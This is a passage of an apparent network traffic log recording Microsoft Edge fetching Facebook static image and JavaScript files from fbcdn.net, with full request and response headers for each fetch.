alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/O7nelmd9XSI.png

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yU/r/O7nelmd9XSI.png HTTP/2.0
host: static.xx.fbcdn.net
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
content-md5: OcEdZWIg79UvSWVADRSQCg==
expires: Wed, 11 Sep 2024 22:47:36 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
x-fb-debug: f8yYd0Tb3axc3RmlBz1FulftF4Yhc7e7ugluhtA/SFJcr2tCSG+FgmBg6h6PPLJZPm8+cktkq9b11mtn0GLZUQ==
content-length: 95
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yB/r/Y0L6f5sxdIV.png HTTP/2.0
host: static.xx.fbcdn.net
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
content-md5: hFRfTj3CmfIMC+ZxDLCYWA==
expires: Thu, 05 Sep 2024 07:12:29 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
x-fb-debug: 2M/AQNxFLuZHCk1/ngHmXbNJNfH62eH5VOOLGIqc6mH24YQTeyafJML0XWirCz7XAu+/N8m20HnYoGmgcTfIGg==
content-length: 6739
date: Mon, 18 Sep 2023 01:48:06 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yu/r/EBMAeYuhJHU.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yu/r/EBMAeYuhJHU.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 15 Sep 2024 01:58:26 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: ItI2/TBtjilntN/wcN6kdA==
x-fb-debug: 4uY1xNcnBDKbPv7qggRV6FKdmJ/dNOctnpY7ipP+eIC9K1WeHAfbDYjg2sqGs87XkYkpilnKatWkGRV8p5hAsA==
content-length: 10783
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/M08arqdo_nN.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yC/r/M08arqdo_nN.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 05 Sep 2024 07:21:08 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: 8ABjy/3nmIc89j0uGsJXLw==
x-fb-debug: paydMBURwiYEnk4eFgBA188z36laqOJwhU4RXXCaaFqfwwExtMO5xeMuiNYvpDFtO1BvzqNT3br5c1imuy2TCg==
content-length: 720
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/LoYlinFj9or.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/y-/r/LoYlinFj9or.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 16 Sep 2024 17:11:39 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: 50ntcriaikv/BMRASa4AVA==
x-fb-debug: cO2mpaimkObSVb6G7FSwnlbwasW05QCu5umZ11fQ8cbsZk0Hbak0cScdceaUUDktFLbN8/ACtszBh/cGTd4LFQ==
content-length: 2047
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yZ/r/nDrypLAL0ob.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yZ/r/nDrypLAL0ob.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 16 Sep 2024 17:11:39 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: Ip3edV5rUeN4GTmGQoBmGg==
x-fb-debug: meFVVSP9qCuhEYFkwH8T/5525zrjYBFtka6H2T/9MDCpoazL+T0dHvCCqVmKQi/v/ZLm1n8/bZK5Jt7IXVEl6g==
content-length: 5669
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/pukjd1lDNzh.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yn/r/pukjd1lDNzh.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 16 Sep 2024 16:47:42 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
content-md5: nZgLQrniSukxvIJvkZmsKQ==
x-fb-debug: cbJDLXwAyVcNSS3ydvLRuzsEf2IIJ54TUuk5gkPmLRKpSkMN1VpGhiPYwm1qVW1tIa3miYoI0tC8GJWY53XUDg==
content-length: 5811
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yF/r/p55HfXW__mM.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 12 Sep 2024 22:14:18 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: rCaoXGogNHhuMqDRrl81UQ==
x-fb-debug: gZvrA3cpANoXLJsCnGAdOExHd0zPIiPu6bEqWucHq5lQB7k8gz0GbIqOnP1oYVcO8CJsJxBr3finGuF55N7UAg==
content-length: 9100
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yA/r/TrP53r_-v-T.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yA/r/TrP53r_-v-T.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 16 Sep 2024 17:11:39 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: jaLlIvZ2tI4nmD0SH0jFjQ==
x-fb-debug: ULd0Kk66sc5O/vT5T/Cl0ab57ML+ZpbI5tB9hU68CmmPcESp0LZhRD/fv2YQNS1gX7a543haaVgjczrk29MMsw==
content-length: 6290
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/rrIiJZftmer.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yD/r/rrIiJZftmer.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 04 Sep 2024 14:28:12 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
x-fb-optimizer: 1
content-md5: L5E9gSgR735vyjAzTFly4g==
x-fb-debug: R6NKNwazMWEyFBjHr3Zbeno+DdxrgmKxXX/j6qBk7YbOytz3M8+Bh36orr+qhDSyCVq2WMNw1E5o+T2xvF9+Xw==
content-length: 293
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/BTdUGzsTGVy.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/y9/r/BTdUGzsTGVy.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 04 Sep 2024 10:23:05 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: NN2YSXlN5uRVs4w3Lmr3FA==
x-fb-debug: wbyDMc6pDooP/5WOEGf1v4Chj0Q6awTrR9dfXxd5hmOehGPIaHi4UAN8hqUL3f3Nvj4QvfPRbjZ/qkm/Wu3C1g==
content-length: 13014
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yf/r/LgvwffuKmeX.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yf/r/LgvwffuKmeX.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 12 Sep 2024 11:21:48 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: PldG2K93jqRXo+UeJQgnnQ==
x-fb-debug: pHo4ZWE6drglF2UN0xO86Jrvv+PpubmH4i8jmV8bp6Sln9b8OsE5o3MHJvUN/slJy8So0ohVA0KJzmGooKkUaQ==
content-length: 2429
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/8dQyU2JZSAY.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/ye/r/8dQyU2JZSAY.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 13 Sep 2024 00:36:41 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: pUDkV8IoSRieAg2fVj6Uvg==
x-fb-debug: jSpFAX21Pifn2sMWmlb1SXCqVDQnSJAR5LNKW3p9Uzh3X0RvUZB5n4xTKw29IoY0aCmJ9GHK4mMUvy/AjvmwwQ==
content-length: 11934
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/ym/r/UhsarKlkZ3v.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/ym/r/UhsarKlkZ3v.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 08 Sep 2024 08:45:59 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: 2mTC+oe6qttbM3SbxzyAaw==
x-fb-debug: lOKmYZa11LSVcojrCLI6rXfBP8C5NHDv0Un0w6KT7bPQnStqlGu28jX50nDSoiacY0syXuLXyw4NV6P5ZHDe3A==
content-length: 2248
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/ys/r/bYk4VlHfuzw.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/ys/r/bYk4VlHfuzw.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 15 Sep 2024 16:02:46 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: mQlnptSEFPIy+vMOwHLFCg==
x-fb-debug: GFaj11WcCDwIopumsrF988j1WtoHL1McoLAkRaOVKbarRJA8u8LmouIaMJDJ3R2JWPkvajWciTTbyEJFZUxVKQ==
content-length: 6045
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yJ/r/iSgtY1vM8wW.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yJ/r/iSgtY1vM8wW.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sun, 08 Sep 2024 08:45:59 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: RFwdiPdm871pzGVKX/NLzA==
x-fb-debug: 6RJRZD1GNr1IsVmbOR9KRuAxGKoWbzggYSUn9/d8NnRL+cRtv/1R4gD+jRsqGlyEoFmv7s2BAcZm2ydnvFF8ew==
content-length: 1206
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3il8Q4/yR/l/en_US/e7GKY53u0xt.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3il8Q4/yR/l/en_US/e7GKY53u0xt.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Mon, 16 Sep 2024 12:49:13 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
x-fb-optimizer: 0
content-md5: OxRViEwovbSE46NuY1RAdg==
x-fb-debug: TELDkVDIWK9Yy0hTZHcFyPVQzhz9TbdMWTOWYU7lvmVYoo/sP958XOzFSxn+Eyoe+qZXX3vPdM25glRYWENTxw==
content-length: 13887
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3iLl54/y_/l/en_US/H21EtDFy9Mr.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3iLl54/y_/l/en_US/H21EtDFy9Mr.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 13 Sep 2024 00:21:49 GMT
cache-control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: +rYYRHFHVyruhdkneW8JyQ==
x-fb-debug: j+z2IWx5VZWSxONA5aSVmL0ofIpA7RWrzrxExVaU8Rn+zvJ4dCmaGhGA/CJwsJ/7CMH9s7eFaYlnKGOZEZAT4A==
content-length: 6108
date: Mon, 18 Sep 2023 01:48:08 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/Z48vtSCIBTI.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yD/r/Z48vtSCIBTI.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
